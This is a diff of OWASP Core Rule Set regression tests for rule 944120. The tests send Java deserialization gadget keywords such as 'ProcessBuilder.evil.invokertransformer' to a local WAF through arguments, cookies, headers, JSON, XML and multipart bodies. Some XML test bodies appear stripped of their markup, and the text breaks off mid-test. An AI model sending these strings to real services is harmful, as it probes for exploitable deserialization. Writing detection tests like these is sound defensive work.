"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-66 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-67 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-68 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-69 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 80 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 